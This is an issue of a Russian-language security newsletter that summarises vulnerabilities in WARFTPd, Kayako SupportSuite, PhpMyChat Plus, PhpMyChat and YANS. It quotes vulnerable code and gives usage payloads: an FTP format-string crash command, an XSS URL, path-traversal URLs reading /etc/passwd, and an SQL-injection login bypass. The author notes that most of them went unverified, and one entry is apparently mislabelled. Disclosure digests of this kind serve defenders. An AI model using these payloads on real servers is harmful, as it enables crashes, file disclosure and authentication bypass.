Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в WARFTPd, Kayako


Компьютер для продвинутых пользователей
В этом выпуске:
WARFTPd | Kayako SupportSuite | PhpMyChat Plus | PhpMyChat | YANS
ПО: WARFTPd
Версия: 1.82.00

Уязвимость:
Продукт подвержен переполнению буфера, когда отправляются команды большой длины с символами "%s" внутри. Это выглядит, как невыполняемый, содержащий ошибки запрос, однако он выполнится и приведёт к зависанию системы.
При крахе сервера выдаёт ошибку:
EAX 00000001
ECX 00000073
EDX 00000002
EBX 0079E890
ESP 0079E7A0
EBP 00A55A8A ASCII
"s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s
characters)"
ESI 0079E7DE
EDI 0000000A
EIP 00431540 war-ftpd.00431540

00431540   8A08             MOV CL,BYTE PTR DS:[EAX]
Достаточно одного запроса и обрываются все операции с файлами.
Использование:
$ ftp target
(Banner)
ftp> quote user anonymous
ftp> quote pass bla
ftp> cwd %s*256
или
ftp> cdup %s*256
Комментарий::
Проверить справедливость этой уязвимости не получилось.

ПО: WARFTPd
Версия: 3.00.32

Использование:
www.Site.com/[support Path]/index.php?=[xss]
Комментарий::
Проверив в Рунете возможность выполнения команды index.php=<script>alert('test')</script> ничего не добился. Не исключаю возможность применения маскировки для более эффективной работы.

ПО: PhpMyChat Plus
Версия: 1.9

Уязвимость:
Уязвимости подвержаны:
avatar.php
colorhelp_popup.php
color_popup.php
index.php
index1.php
/lib/connected_users.lib.php
/lib/index.lib.php
logs.php
phpMyChat.php3
Уязвимый код:
...
.....
require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");
require("./${ChatPath}/lib/clean.lib.php");
.....
...

Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] L=[file]
Key [:] ChatPath=[file]
Использование:
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd
http://target.com/path/index.php?ChatPath=../../etc/passwd
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
http://target.com/path/logs.php?L=../../etc/passwd
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd

Комментарий::
Провозился с этой уязвимостью около 2 часов, ничего не дало. Зато нашёл возможность раскрыть путь продукта.

ПО: PhpMyChat
Версия: 0.14.5

Уязвимость:
Уязвимый файл - localization/languages.lib.php3
Ошибочный код:
...
.....
require("./${ChatPath}config/config.lib.php3");
require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
require("./${ChatPath}lib/clean.lib.php3");
.....
...

Key [:] ChatPath=[file]
Использование:
http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd
Комментарий::
Провозился с этой уязвимостью около 2 часов, ничего не дало. Зато нашёл возможность раскрыть путь продукта.

ПО: YANS

Уязвимый код:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
Использвание:
В поля авторизации ведите - ' or '1=1
Комментарий::
Проверить не удалось по банальной причине - нет сайтов использующих эту систему.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное